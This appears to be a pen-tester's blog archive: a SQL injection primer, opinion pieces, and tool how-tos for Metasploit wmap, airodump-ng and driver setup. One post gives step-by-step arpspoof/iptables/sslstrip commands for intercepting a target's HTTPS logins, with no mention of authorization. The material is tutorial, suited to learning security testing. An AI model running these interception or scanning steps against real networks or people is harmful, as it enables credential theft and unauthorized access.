So I’ve noticed something; my post count is abysmal. I never seem to say anything at all.
I suppose this could be a good thing. Perhaps it shows that I am just too busy doing work and I don’t have time to talk about work. Alternatively, I suppose it could indicate a certain freedom from the shackles of the digital world and that I do, indeed, have a life which does not require a lithium battery to operate. Then again, perhaps it just shows that I’m a lazy bastard…
Well, no more! Starting here, I have a multi-part posting that will be informative, humorous and hopefully long enough to indicate a certain amount of interest in this blog (not your interest, dear reader… mine). Let’s talk about SQL injection attacks.
SQL injection, you say? What an excellent idea! After all, OWASP (https://www NULL.owasp NULL.org/index NULL.php/OWASP_Top_Ten_Project#Main) continually rates it as the number one web app vulnerability facing us today… so let’s learn more!
Glad you agree, I say!
But, you ask, isn’t there plenty of information about this exploit available already?
Shut your pie hole, I say! You can never get enough of a good thing!
Sheesh! Now that we have that out of the way and you feel appropriately chastised, let’s get started, eh?
———————————————
Ok, first of all (just in case), let’s make sure we all understand exactly what SQL is;
SQL stands for “Structured Query Language” and it is this language which is used to maintain data within a relational database. (http://en NULL.wikipedia NULL.org/wiki/Relational_database) Data such as names, places, quantities or descriptions of items (or individuals) are stored within the “SQL database” and by utilizing SQL commands, an individual or application may create, access, edit or delete the data which the database holds. Typical examples from the internet might be user logon pages or an online shopping cart. There are several different flavors of SQL (read: vendors). We are going to focus on MySQL (http://mysql NULL.com/). Why? Because I said so.
Simple, right?
Alright then. Now let’s make sure we all have a grasp of what an “injection” attack is;
I’m thinking it wouldn’t take you very long to find a web page that has a logon form. That good old request for your username (or email) and your password. The basic logic behind this is fairly straightforward; you are being asked to identify yourself and then to prove it. The application then looks at the SQL database and sees if you are in there. If you are, it verifies your password and gives you whatever you are allowed to have based on your identity’s allowed level of access, or; “permissions”. So far, so good… right?
Ok, well let’s assume that instead of entering your username, you instead entered (injected) a SQL command into the username field that said “show me everybody’s usernames”. The application, thinking that your entry was just a username, would forward that entry to the SQL database (assuming that it was vulnerable to such attacks) and the database would then interpret the command and do exactly what it was told to do… show you everyone’s usernames. There you have it… you just used a “SQL injection” attack to gather information from a database that you should not have had access to. Congratulations!
We’ll go over exactly this sort of example in later posts, so relax if the details are still a bit fuzzy for you. However, before we get into working with the “injection” portion, we’re going to work a bit with the “SQL” part of this equation. There are plenty of automated tools which will audit a web application and attempt to determine if it is vulnerable to this sort of attack. If you just want to be a button pusher, stop reading my damn posts and go use one of those. However, if you want to be a bit smarter than the tools that you employ, cross your fingers and stick around for just a bit longer!
Now let’s set up our environment.
So here’s the deal; to really understand SQL injection attacks, you need to understand SQL. I’m not saying that you need to be an expert database administrator, but you really need to know your way around a bit. To that end, I want to go through managing a local MySQL server and getting comfortable with manipulating database/table data.
I happen to have, right here in front of me, a fresh install of BackTrack 5R2 (http://www NULL.backtrack-linux NULL.org/downloads/) with the Gnome interface. It isn’t mandatory, but let’s say it is strongly suggested that you work from the same platform. Otherwise, you are pretty much on your own here and the rest of this post will make a lot less sense…
The first thing we want to do is fire up our local instance of the MySQL server, we could do so from the menu (navigate to Applications > Backtrack > Services > MySQLD) but I think that whenever possible we need to be at the command line. So, from the terminal you start a service like so:
# service service action
On our BackTrack system, you can find the list of installed, available services within the /etc/init.d directory (such as /etc/init.d/mysql). Most services will have three available actions; start, stop and restart. Let’s try to start our MySQL server:
# service mysql start
which should return a status something like this:
mysql start/running, process 12345
the last part would be the “process ID” and would change for each running instance.
To stop or restart the mysql process, simply issue the appropriate command:
# service mysql stop
# service mysql restart
Ok, before we go a lot further, let’s look at some background information for homework research (http://en NULL.wikipedia NULL.org/wiki/MySQL)! Besides, the post word count is getting a bit high and I don’t want to ruin all the surprises at once…
In the next post we are going to learn some basic SQL commands and how to use them to create, manipulate and delete not only data but the databases that hold that data.
see you there!
~me
Four years ago, give or take, Gartner Technology Group had this to say about open source software and its emerging role in the enterprise:
By 2012, 80 per cent of all commercial software will include elements of open source technology. Many technologies are mature, stable, and well supported. They provide significant opportunities for vendors and users to lower their total cost of ownership and increase returns on investment. Ignoring this will put companies at a serious competitive disadvantage.
I’m willing to go a step further; as of 2012, the typical small to mid-sized enterprise (with limited resources requiring third-party support options) can easily support their mission needs and IT infrastructure entirely with open source software. Most of these open source offerings would be free (as in puppies), although in some cases certain advantages could certainly be gained by paying for an advanced version of the software or elevated support options.
In addition, many of these open source offerings represent best-of-breed solutions and in at least a couple of instances (snort and apache, for instance) are, in my opinion, the de facto standard.
Virtualization has Xen, ThinClients have Thinstation. SecurityOnion, PacketFence, FreeNAS, Bacula, AlienVault, TripWire, Wireshark, Splunk, Smoothwall, Nagios, Funambol, Asterisk… I could run out of (virtual) ink just trying to list them all.
Don’t sell your clients/employers short simply because there is an expensive, over the counter solution to their need. Do your homework and ensure that you are really giving them the best that you can, tailored to their exact needs.
Maybe they’ll use all that extra cash to pay you more… just saying.
~me
so, im writing this from an airport lounge. i had to go through a bag search, two ID checks and one of those creepy full-body imaging scans to get here in the first place, now i had to do it again just to get back home. i feel fairly vetted at this point. dirty…but vetted.
im here because i just finished up a pen-test for several vendors who are hoping to do business with the federal government. the exercise was conducted on-site at the local Air Force base, so i was expecting that i would have to go through pretty much more of the same in order to get anywhere near where they are keeping all the alien spacecraft and Jimmy Hoffa’s remains.
not so much, it turns out.
here’s the short of it: i am absolutely appalled.
most of my days are spent hired-out to a civilian branch of the feds. I dont do a ton of work for DoD or any of the other military sectors. It has always been my understanding that any work for the military side would entail heightened security. the scary fact is this; aside from an ID check (which was performed by contractor security staff) to get onto the base in the first place, absolutely nobody ever questioned my presence in the least. not once.
i entered buildings, i wandered halls, i opened doors. i talked to people… i even took pictures. i did all of this without a badge or an escort and i did it within the confines of several structures that deal with some fairly high level research. nobody cared.
the airport gave me more of a run-down than physical access to the heart of a military installation did.
my work for the civilian branch of the government has guards at every entrance of a building, requires key card access to go anywhere. escorts for visitors, cameras in every corner and locked doors to keep you honest.
turns out Hoffa ain’t dead. he’s researching alien technology for the feds.
he says hi, by the way.
~me
Back in the days when Steve Jobs was trying to reinvent Apple as a multimedia company (as opposed to a computer company) he did a very intelligent thing. It was a thing that neither he (nor, by proxy; Apple) really had a history of doing; he released Apple software for a non-Apple platform. I am speaking, of course, of iTunes for Windows.
This proved instrumental in the reinvention of Apple. How could they have ever dominated the music player/cell phone industry without releasing iTunes to the other 95% -ish of home computer users?
(well, the true answer is that they could have done away with ridiculous activation/media management restrictions that they place on their devices… but stick with me on this)
Now, as a linux user (and an iPhone owner), this leaves me in a bit of a quandary. Apple, to date, refuses to develop a version of iTunes for linux. I can only assume that this business decision was made for one of two reasons;
1. Apple decided that the linux demographic was simply too small to bother with. Instead of spending resources attempting to develop an iTunes version for linux, simply let them fend for themselves.
or…
2. Apple decided that instead of developing iTunes for linux, they should instead force linux-based iDevice users to migrate to an Apple product (or perhaps iTunes for Windows) in order to activate/manage their iDevices.
If reason #1 were the issue, I would completely understand. No problem. After all, the linux community is comprised of an overwhelming majority of geeks (ok, let’s say “power users“) who can fend for themselves just fine. However, time has proven that it is indeed reason #2. Allow me to explain;
It truly did not take long at all for the linux community to reverse-engineer the iDevice requirements and develop support for these devices into linux-based media management software (i.e. Rhythmbox, Amarok or Banshee as an example… all similar to iTunes in scope). Therefore, the problem was solved. We could now transfer our music, movies, podcasts, what-have-you to our iDevices and everybody wins.
Apple immediately built an “update” to their iDevices which crippled the linux functionality.
Let’s be clear; crippling linux functionality wasn’t a “side-effect” of the update, it was the express intent of the update.
And so it began. Apple releases the update which breaks iDevice support in linux, the linux community then takes a month or so to determine the nature of the change and updates their software to accommodate. Apple retaliates with another update… ad nauseam.
Is Steve Jobs so arrogant as to believe that any significant portion of linux users will abandon their operating system simply in order to maintain functionality of their pod/phone/tablet? Apparently so.
This clearly cannot be an instance of “simply ignoring the linux community”, Apple is spending significant resources to actively wage war on us.
Apple enjoys a devout following. It’s users are religiously devoted to the “cult of personality” which envelops everything that they make. I get that, I really do. I happen to like the products that Apple puts out. However, this attitude is nothing in the face of the jihadist attitude saturating the open-source community (and linux in specific).
I have a prodigious media collection. So large, in fact, that iTunes could not deal with it even if I were so inclined (trust me, I’ve tried). I also spend nearly three hours each work-day on the road. Obviously, aside from communicating, the main purpose of my iPhone is for music playback.
At this point, I have once again lost the ability to manage my media via my linux-based mediacenter. With the rise of the Android OS as a major player in the market, I am simply in awe of the sheer stupidity being displayed by Apple.
I’ll make the switch, Apple. But I don’t think it is the switch that you were hoping for.
As a side-note, the HTC Sensation (http://www NULL.knowyourmobile NULL.com/comparisons/855860/htc_sensation_vs_apple_iphone_4 NULL.html) is looking really sexy. You should check it out, Steve… I know I will.
~me
Ok, let’s rant about one of my pet-peeves (and boy isn’t that a list):
Ever go to one of those websites that uses SSL encryption and boldly states something like;
“We use SSL encryption to protect your data. This site is certified as absolutely secure! We DARE anyone to try to steal your information, you can feel perfectly safe telling us all your dirty little secrets”.
So, you go ahead and throw in your credit card numbers, banking information, girlfriend’s hat size, whatever. After all, they said it was safe, right?
Ok, let’s not even bring up the dozens of ways that SSL doesn’t cover you (XSS, SQL injection, etc…), let’s just focus on how easy it is to circumnavigate it in the first damn place. Ready? Ok, here we go:
First of all, let’s make sure we have a nice little attack platform set up. I’ll use BackTrack 4R2, you use whatever you like.
Next, let’s make sure we have a nice little tool known as “sslstrip” installed (i do, i’ll wait here if you need to go get it).
sslstrip is basically used to set up a MITM (man-in-the-middle) attack. It intercepts your data, takes what it wants and then forwards it on down the line. Classic arp-spoof attack at it’s simplest.
First, we need to make sure that our system will actually forward the data that it receives from the victim. To enable port forwarding, I’ll enter the following command:
# echo 1 > /proc/sys/net/ipv4/ip_forward
The next thing I’ll do is tell my system to forward any TCP packets that it gets from port 80 (the victim’s web browsing) to another port so that sslstrip can monitor, record and send it on down the line without interfering with whatever else I’m doing in the meantime:
# iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 12345
The port that you forward the traffic to is fairly irrelevant, just make sure that you aren’t stepping all over existing traffic.
Ok, so let’s convince our target that we are their gateway to the world. Just like St. Louis. Wait, that’s the gateway to the west. Sorry. Anyway, you obviously need to know two things; the IP address of your target and the IP address of their gateway. Once you have that, the command you want is this (oh, yeh… did i mention you needed arpspoof?):
# arpspoof -i interface -t target_ip gateway_ip
Lastly, let’s start up sslstrip and tell it to write (-w) what it sees to a log file. My log files take the form of “target_date_time_tool” with the time being in UTC. So, for me the command would look something like this:
# sslstrip -w ~/forensics/engagement/target_yyyy_mm_dd_2400UTC_sslstrip
…and we go read a book. Depending on the traffic generated, we may even have time to go write a book.
If everything goes well, we convince the target that to get anywhere at all they have to go through us. We then log all their information and forward it to wherever they were trying to go. The important difference is that what the target sends us is unencrypted. Let this cook for a while and then check the log file for goodies…
Happy hunting!
~me
Couldn’t really find one place on the web that detailed the use of the wmap plugin for metasploit correctly. I’ve pieced together the instructions below for running metasploit/wmap on backtrack 4r2.
—————
ok, so first let’s install a couple of dependencies:
# apt-get install libxml-ruby libxslt-ruby libxslt-dev
# gem install anemone
# gem install nokogiri
right then. let’s start our mysql server (or postgre, whatever you like):
# service mysql start
and now let’s move into metasploit:
# cd /opt/metasploit3/msf3/
# ./msfupdate
# ./msfconsole
metasploit defaults to postgre as it’s db_driver, so let’s change that and then create a database to use with wmap (you can call yours whatever you want):
msf> db_driver mysql
msf> db_connect root:toor@127.0.0.1/wmap
…that last bit assumes you haven’t changed the default mysql password.
ok, let’s load wmap and our http crawler:
msf> load wmap
msf> use scanner/http/crawler
you can show options to see what you need, but all we really need to do is set the “RHOST” variable:
msf> set RHOST www.website.com
and let’s make some magic:
msf> run
ok, so this will add our website of choice into the wmap database. you can verify by listing the sites:
msf> wmap_sites -l
assuming you see what you expected to (and you don’t want to add any more sites to the db for now), let’s load this site as a target (by URL and IP):
msf> wmap_targets -t www.website.com,11.22.33.44
at this point, we have options for viewing the modules that will be run against our target (wmap_run -t), changing advanced settings (setg), etc… but let’s just run wmap against our target:
msf> wmap_run -e
when it’s time to review the findings, you’ll want:
msf> db_vulns
and
msf> db_notes
…hrm. now what to do with it?
finally got around to jailbreaking my iphone 3gs running ios 4.2.1
installed apt, openssh as well as a terminal application through cydia.
ssh’d into localhost, su’d and changed my root password immediately (default password is ‘alpine’).
installed metasploit by the following steps:
# apt-get install subversion nano wget python
# apt-get clean
# wget http://www.metasploit.com/releases/framework-3.4.1.tar.bz2
# tar jxpf framework-3.4.1.tar.bz2
# rm ./framework-3.4.1.tar.bz2
# cd msf3
# svn update
# cd ..
i would have installed ruby and rubygems via apt as well, but the version in the cydia repos right now breaks metasploit.
so instead:
# wget http://apt.saurik.com/dists/tangelo_0.9/main/binary-iphoneos-arm/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb
# dpkg -i ./ruby_1.8.6-p111-5_iphoneos-arm.deb
# wget http://apt.saurik.com/dists/tangelo_0.9/main/binary-iphoneos-arm/debs/rubygems_1.2.0-3_iphoneos-arm.deb
# dpkg -i ./rubygems_1.2.0-3_iphoneos-arm.deb
# rm ./ruby*
…and the rest, as they say, was history:
having a dedicated pentest system is extremely convenient, if not essential. i use a modified backtrack 4r2 system (greybox), installed locally and using flux as its window manager. boot disks have their place, but i also like to know that my work has a persistent home.
one pain, however, is that locking the screen is a bit of a chore. the largest hurdle; xscreensaver simply refuses to function under root logon. i could create non-root users, which in most other cases would be best anyway, but in this instance it creates a series of other issues i’d rather not deal with.
here’s a few quick steps that will get an auto-locking screen using root login and fluxbox. this isn’t the only solution, but certainly simple and effective.
first, let’s install two packages:
# apt-get install xautolock xlockmore
…and now, let’s open up the fluxbox startup script:
# pico ~/.fluxbox/startup
…and let’s add a couple of lines (make sure they are above ‘exec fluxbox’):
# autolocks X screen after 15 minutes of inactivity
xautolock –time 15 –locker “xlock –mode blank” –secure &
that’s it. no mess or fuss. save and exit. go ahead and manually run the xautolock command as it is listed above to start it now (or just restart fluxbox).
# airmon-ng
–determines applicable interfaces
# airmon-ng stop interface
# airmon-ng start interface
–this puts the interface into monitor mode via an interface alias (most likely mon0)
# airodump-ng -w /path/to/file/target_yyyy_mm_dd_2400UTC_tool –output-format pcap,csv InterfaceAlias
–this starts the airodump-ng scan,displays results and writes our files.
** ‘s‘ changes sorting options, for instance; by power-level ( ‘d‘ resets defaults)
** ‘r‘ (de) activates real-time sorting
** ‘SPACE‘ pauses display
** ‘TAB‘ (de) activates scrolling selections
** ‘m‘ highlights selection (and associated stations) in one of several color choices
** ‘CTL+Z‘ to close airodump-ng
if you need to do a quick conversion to UTC, try this:
# date –utc
i had hoped that getting the awus036nh to work in BT4R1 was going to be a relatively simple
issue…
i made sure that the system was updated and upgraded via apt, then;
# apt-get install firmware-ralink
# cd /usr/src/drivers/compat-wireless-2010-07-10
# ./scripts/driver-select rt2×00
# make
# make install
# make unload
# modprobe rt2800usb
there was a misconfiguration issue of the AP and interface (mon0) being reported as on different channels via aireplay-ng. i downloaded patch (http://www NULL.backtrack-linux NULL.org/forums/backtrack-howtos/31264-howto-alfa-802-11a-b-g-n-awus050nh-rt2800usb-backtrack-4-r1-2 NULL.html) and compiled:
# cp chan.patch /usr/src/drivers/compat-wireless-2010-07-10/net/wireless/
# cd /usr/src/drivers/compat-wireless-2010-07-10/net/wireless
# patch -p0 < chan.patch
unfortunately, not so easy.
problem 1: while the alfa did work, it was constantly dropping the connection.
problem 2: the internal bcm43xxx stopped seeing anything at all.
i tried several solutions (including the re-install of b43-fwcutter) but no love, really.
luckily, BT4R2 came out so i did a rip/replace upgrade and apparently everything is working right out of the box…
still dropping signal way too much, but we’ll see what we can do about that.
amen to muts, et. al.
~me
